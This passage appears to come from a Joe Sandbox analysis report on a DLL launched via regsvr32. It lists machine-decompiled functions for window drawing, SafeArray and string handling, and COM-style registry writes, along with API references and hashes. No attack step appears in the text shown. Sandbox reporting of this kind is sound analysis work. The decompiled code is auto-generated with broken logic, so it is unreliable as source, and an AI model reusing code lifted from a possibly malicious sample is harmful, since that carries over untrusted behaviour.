					_push(0);
					_push(0xf107);
					L10053A33(_t48, _t65);
				}
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				E10064B8B();
				_t37 = E10040D35();
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				return _t37;
			}

0x10042dfc
0x10042dfc
0x10042e01
0x10042e06
0x10042e09
0x10042e13
0x10042e16
0x10042e1e
0x10042e29
0x10042e34
0x10042e3a
0x10042e3a
0x10042e40
0x10042e4e
0x10042e5b
0x10042e60
0x10042e68
0x10042e70
0x10042e7d
0x10042e82
0x10042e8a
0x10042e91
0x10042e91
0x10042ea5
0x10042eab
0x10042eae
0x10042eb0
0x10042eb2
0x10042eb3
0x10042eb8
0x10042eb8
0x10042ebd
0x10042ec1
0x10042ec9
0x10042ed3
0x10042edb

APIs

__EH_prolog.LIBCMT ref: 10042E01
SendMessageA.USER32 ref: 10042E4E
SendMessageA.USER32 ref: 10042E70
GetCapture.USER32 ref: 10042E82
SendMessageA.USER32 ref: 10042E91
WinHelpA.USER32 ref: 10042EA5

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: 4bafb3ef79bc64685c4f9a8c9e0eb01c0e3ef66900ae6ffee83b70de1f50f740
Instruction ID: dd531845c9de3e2542be1e07e8d02561874b21232643888cf91fc0284b9c91a5
Opcode Fuzzy Hash: 4bafb3ef79bc64685c4f9a8c9e0eb01c0e3ef66900ae6ffee83b70de1f50f740
Instruction Fuzzy Hash: E2216275600609BFEB21DF64CC8AF6AB7AEEF44750F118579F141971E2CB71AC019B60

Uniqueness

Uniqueness Score: -1.00%

Function 1002B071 Relevance: 9.1, APIs: 6, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B071(void* __eax, void* __edx, void* __esi, signed char _a8, struct HDC__* _a13, struct HWND__* _a17) {
				signed char _t7;
				signed char _t8;
				long _t10;
				intOrPtr _t13;
				long _t18;
				struct HDC__* _t22;
				struct HWND__* _t25;

				_t1 = __esi + 0x74;
				 *_t1 =  *((intOrPtr*)(__esi + 0x74)) + __edx;
				if( *_t1 < 0) {
					L10:
					return 0;
				} else {
					_t7 = _a8;
					_t8 = _t7 & 0x00000008;
					if(_t8 < 0x134 || _t8 == 0x137) {
						goto L10;
					} else {
						if(_t8 != 0x134) {
							L9:
							_t22 = _a13;
							_t10 =  *0x10096d50; // 0x0
							SetTextColor(_t22, _t10);
							_t18 =  *0x10096d48; // 0x0
							SetBkColor(_t22, _t18);
							_t13 =  *0x10096d68; // 0x0
							return _t13;
						} else {
							if( *0x10096d40 >= 0x35f) {
								L8:
								return 0;
							} else {
								_t25 = _a17;
								if(GetWindow(_t25, 5) == 0 || (GetWindowLongA(_t25, 0xfffffff0) & 0x00000003) == 3) {
									goto L8;
								} else {
									goto L9;
								}
							}
						}
					}
				}
			}

0x1002b076
0x1002b076
0x1002b079
0x1002b0ec
0x1002b0ef
0x1002b07a
0x1002b07a
0x1002b07c
0x1002b083
0x00000000
0x1002b08c
0x1002b091
0x1002b0c4
0x1002b0c4
0x1002b0c8
0x1002b0cf
0x1002b0d5
0x1002b0dd
0x1002b0e3
0x1002b0e9
0x1002b093
0x1002b09c
0x1002b0be
0x1002b0c1
0x1002b09e
0x1002b09e
0x1002b0ad
0x00000000
0x00000000
0x00000000
0x00000000
0x1002b0ad
0x1002b09c
0x1002b091
0x1002b083

APIs

GetWindow.USER32(?,00000005), ref: 1002B013
GetWindow.USER32(00000000,00000002), ref: 1002B031
GetWindow.USER32(?,00000005), ref: 1002B0A5
GetWindowLongA.USER32(?,000000F0), ref: 1002B0B2
SetTextColor.GDI32(?,00000000), ref: 1002B0CF
SetBkColor.GDI32(?,00000000), ref: 1002B0DD

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Color$LongText
String ID:
API String ID: 2984118161-0
Opcode ID: 0345b536a6d9fd875eb31ea0b12f831a89aaddf98129ba25a428376e06c59273
Instruction ID: 7a2138d770039c16d96e50e0e2af014a7dacc2e17d8cc2fdf84532c14ae75471
Opcode Fuzzy Hash: 0345b536a6d9fd875eb31ea0b12f831a89aaddf98129ba25a428376e06c59273
Instruction Fuzzy Hash: CF112632B04A2197E322D764ACC9F9F7798FB55350F410817F621971D1DB61AD4287A2

Uniqueness

Uniqueness Score: -1.00%

Function 10016B26 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

SafeArrayGetDim.OLEAUT32(?), ref: 10016B3A
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10016B4E
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10016B63
SafeArrayRedim.OLEAUT32(?,?), ref: 10016B8F
VariantClear.OLEAUT32(?), ref: 10016B9E
SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 10016BBB

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ArraySafe$Bound$ClearCreateRedimVariant
String ID:
API String ID: 3151960920-0
Opcode ID: 95fb496116f667b19606b795722b8e9329beca2a086a7e768795d97635b4b1f9
Instruction ID: 4a6001919f95959d0dd337a203fbfbe91a3dcb2343dbfac03e43700274733b7b
Opcode Fuzzy Hash: 95fb496116f667b19606b795722b8e9329beca2a086a7e768795d97635b4b1f9
Instruction Fuzzy Hash: 7C113A7590061ABFEB14DFA4CC85A9EBBB9FF48300F108466F949EA160D771EAC0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10016CE8 Relevance: 9.0, APIs: 6, Instructions: 50memorystringCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 10016CF1
lstrlenA.KERNEL32(?), ref: 10016D0F
SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 10016D17
lstrlenA.KERNEL32(?), ref: 10016D1F
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 10016D45
SysAllocString.OLEAUT32 ref: 10016D4C

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocByteStringlstrlen$CharClearMultiVariantWide
String ID:
API String ID: 4058993622-0
Opcode ID: a5d685cc3d9f837d4cad776efe6f68d5f26f4556369ef0cff027c598db868227
Instruction ID: c03ab2f1ce4487bcc73c313cd8f7b5e525a5f2e64b40b0fdcbd4d61b6b6e37ed
Opcode Fuzzy Hash: a5d685cc3d9f837d4cad776efe6f68d5f26f4556369ef0cff027c598db868227
Instruction Fuzzy Hash: 8701D832900126BBEB10AB69DC8999A7BFCFF092617008112F919C6120D774D854C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 10065B07 Relevance: 9.0, APIs: 6, Instructions: 48
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10065B07(void* _a4, char* _a8, char* _a12) {
				void* _t19;
				signed int _t21;
				long _t24;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						return 0;
					}
					_t24 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					if(RegCloseKey(_a4) != 0 || _t24 != 0) {
						goto L6;
					} else {
						_t19 = 1;
						return _t19;
					}
				}
				_t21 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t21 + 1;
			}

0x10065b0f
0x10065b49
0x10065b81
0x00000000
0x10065b81
0x10065b6c
0x10065b76
0x00000000
0x10065b7c
0x10065b7e
0x00000000
0x10065b7e
0x10065b76
0x10065b28
0x10065b30
0x00000000

APIs

lstrlenA.KERNEL32(?), ref: 10065B14
RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10065B28
RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10065B41
lstrlenA.KERNEL32(?), ref: 10065B4E
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10065B63
RegCloseKey.ADVAPI32(?), ref: 10065B6E

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Valuelstrlen$CloseCreate
String ID:
API String ID: 306239685-0
Opcode ID: 85169aa07dda5e8d2b405aa9a2c7178137abdef410a3c4a173a86659072de58b
Instruction ID: 34e22d03a679cc504002256768e1e923f96a953fca6ce14198d33562111fd8e7
Opcode Fuzzy Hash: 85169aa07dda5e8d2b405aa9a2c7178137abdef410a3c4a173a86659072de58b
Instruction Fuzzy Hash: 46014F3214111AFFEF125FA0CC49F9D3BAAFB087A2F109511FE5DE81A0D7728A609B50

Uniqueness

Uniqueness Score: -1.00%

Function 10046CD5 Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10046CD5(void* __ecx) {
				struct HDC__* _t17;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
					E10064DC3();
				} else {
					E10064D93();
				}
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}

0x10046cde
0x10046ce6
0x10046cef
0x10046cf2
0x10046cfb
0x10046cf4
0x10046cf4
0x10046cf4
0x10046d0e
0x10046d18
0x10046d20
0x10046d2c

APIs

GetSystemMetrics.USER32 ref: 10046CE2
GetSystemMetrics.USER32 ref: 10046CE9
GetDC.USER32(00000000), ref: 10046D02
GetDeviceCaps.GDI32(00000000,00000058), ref: 10046D13
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10046D1B
ReleaseDC.USER32(00000000,00000000), ref: 10046D23

Part of subcall function 10064D93: GetSystemMetrics.USER32 ref: 10064DA5
Part of subcall function 10064D93: GetSystemMetrics.USER32 ref: 10064DAF

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: f5db5bdf803803766ac773dfadaae2b3fbd4818be3e8e98b6e2b74a6836a476f
Instruction ID: 4d0df46f409c53d7c981767b8d030d6f19dd9fda0d72e2ade77506122268743c
Opcode Fuzzy Hash: f5db5bdf803803766ac773dfadaae2b3fbd4818be3e8e98b6e2b74a6836a476f
Instruction Fuzzy Hash: C2F05434A40710AFF3249B75CC89F1B77A5EF84756F12442BE649866D0DAB19C00CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10013131 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 280
memoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E10013131(intOrPtr* __ecx) {
				intOrPtr* _t135;
				intOrPtr _t136;
				intOrPtr* _t141;
				intOrPtr* _t144;
				intOrPtr _t145;
				signed int _t147;
				intOrPtr* _t148;
				intOrPtr _t150;
				intOrPtr* _t158;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t167;
				intOrPtr* _t168;
				signed int _t170;
				intOrPtr _t171;
				intOrPtr* _t172;
				intOrPtr* _t175;
				signed int _t179;
				signed int _t181;
				intOrPtr* _t185;
				intOrPtr* _t187;
				intOrPtr* _t189;
				intOrPtr* _t191;
				intOrPtr _t195;
				intOrPtr* _t197;
				void* _t198;
				intOrPtr _t208;
				intOrPtr* _t211;
				intOrPtr* _t252;
				void* _t254;

				E1001A9E0(0x100775cf, _t254);
				_t252 = __ecx;
				 *((intOrPtr*)(_t254 - 0x28)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t254 - 0x2c)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t135 =  *((intOrPtr*)(__ecx + 8));
					if(_t135 != 0) {
						_t136 =  *((intOrPtr*)( *_t135 + 0xc))(_t135, 0x100822d0, _t254 - 0x1c, _t254 - 0x24);
						if(_t136 >= 0) {
							E10013960(_t254 - 0xa4, 0x100823a0);
							 *(_t254 - 0x84) =  *(_t254 - 0x84) | 0xffffffff;
							 *((intOrPtr*)(_t254 - 0x8c)) = 0;
							 *((intOrPtr*)(_t254 - 0x88)) = 0;
							 *((intOrPtr*)(_t254 - 0x80)) = 0x18;
							 *((intOrPtr*)(_t254 - 0x7c)) = 0;
							 *((intOrPtr*)(_t254 - 0x78)) = 0x1fb;
							E10013960(_t254 - 0x74, 0x10082478);
							_t141 =  *((intOrPtr*)(_t254 - 0x1c));
							 *(_t254 - 0x54) =  *(_t254 - 0x54) | 0xffffffff;
							 *((intOrPtr*)(_t254 - 0x5c)) = 0x1c;
							 *((intOrPtr*)(_t254 - 0x58)) = 0;
							 *((intOrPtr*)(_t254 - 0x50)) = 0x20;
							 *((intOrPtr*)(_t254 - 0x4c)) = 0;
							 *((intOrPtr*)(_t254 - 0x48)) = 0x1e;
							_t195 =  *((intOrPtr*)( *_t141 + 0x10))(_t141, 2, _t254 - 0xa4, 0x28, 0);
							if(_t195 >= 0) {
								 *(_t254 - 0x44) =  *(_t254 - 0x24);
								_t144 =  *((intOrPtr*)(_t254 - 0x1c));
								 *(_t254 - 0x40) = 1;
								 *(_t254 - 0x3c) = 0;
								 *((intOrPtr*)(_t254 - 0x38)) = 0;
								 *((intOrPtr*)(_t254 - 0x34)) = 0;
								_t145 =  *((intOrPtr*)( *_t144 + 0x18))(_t144, 0, 0, _t254 - 0x44);
								 *((intOrPtr*)(_t254 - 0x20)) = _t145;
								if(_t145 >= 0) {
									 *(_t252 + 0x14) =  *(_t254 - 0x3c);
									_t147 =  *(_t254 - 0x30);
									 *(_t254 - 0x24) = _t147;
									 *(_t252 + 0x10) = _t147;
									_t148 =  *((intOrPtr*)(_t254 - 0x1c));
									 *((intOrPtr*)(_t252 + 0x34)) =  *((intOrPtr*)(_t254 - 0x38));
									 *((intOrPtr*)( *_t148 + 8))(_t148);
									goto L21;
								} else {
									_t163 =  *((intOrPtr*)(_t254 - 0x1c));
									 *((intOrPtr*)( *_t163 + 8))(_t163);
								}
								goto L37;
							} else {
								_t165 =  *((intOrPtr*)(_t254 - 0x1c));
								 *((intOrPtr*)( *_t165 + 8))(_t165);
								_t136 = _t195;
							}
						}
					} else {
						_t136 = 0;
					}
				} else {
					_t167 =  *((intOrPtr*)(__ecx + 0x4c));
					_t136 =  *((intOrPtr*)( *_t167 + 0x14))(_t167, 0x10081940, _t254 - 0x14);
					 *((intOrPtr*)(_t254 - 0x20)) = _t136;
					if(_t136 >= 0) {
						_t168 =  *((intOrPtr*)(_t254 - 0x14));
						_push(_t254 - 0x18);
						_push(0x10082280);
						_push(_t168);
						if( *((intOrPtr*)( *_t168))() >= 0) {
							_t185 =  *((intOrPtr*)(_t254 - 0x18));
							 *((intOrPtr*)(_t254 - 0x10)) = 0;
							_push(_t254 - 0x10);
							_push(0x100817d0);
							_push(_t185);
							if( *((intOrPtr*)( *_t185 + 0x10))() >= 0) {
								_t189 =  *((intOrPtr*)(_t254 - 0x10));
								 *((intOrPtr*)( *_t189 + 0x14))(_t189,  *((intOrPtr*)(__ecx + 4)) + 0xd8, __ecx + 0x58);
								_t191 =  *((intOrPtr*)(_t254 - 0x10));
								 *((intOrPtr*)( *_t191 + 8))(_t191);
							}
							_t187 =  *((intOrPtr*)(_t254 - 0x18));
							 *((intOrPtr*)( *_t187 + 8))(_t187);
						}
						_t170 = E10045FEF(0x10);
						 *(_t254 - 0x24) = _t170;
						 *(_t254 - 4) = 0;
						if(_t170 == 0) {
							_t171 = 0;
						} else {
							_push( *((intOrPtr*)(_t254 - 0x14)));
							_t171 = E10013451(_t170);
						}
						 *(_t254 - 4) =  *(_t254 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t252 + 0x50)) = _t171;
						_t172 =  *((intOrPtr*)(_t254 - 0x14));
						 *((intOrPtr*)( *_t172 + 8))(_t172);
						E10013575( *((intOrPtr*)(_t252 + 0x50)));
						_t175 = E10045FEF(0x1c);
						if(_t175 == 0) {
							_t175 = 0;
						} else {
							 *_t175 = 0;
							 *((intOrPtr*)(_t175 + 4)) = 0;
							 *((intOrPtr*)(_t175 + 8)) = 0;
							 *((intOrPtr*)(_t175 + 0xc)) = 0;
							 *((intOrPtr*)(_t175 + 0x10)) = 0;
							 *((intOrPtr*)(_t175 + 0x14)) = 0;
						}
						 *((intOrPtr*)(_t252 + 0x54)) = _t175;
						E1001358A(_t175);
						 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x50)) + 8)) =  *((intOrPtr*)(_t252 + 0x54));
						_t179 =  *( *((intOrPtr*)(_t252 + 0x54)) + 0xc);
						 *(_t252 + 0x10) = _t179;
						_t181 = _t179 + _t179 * 4 << 3;
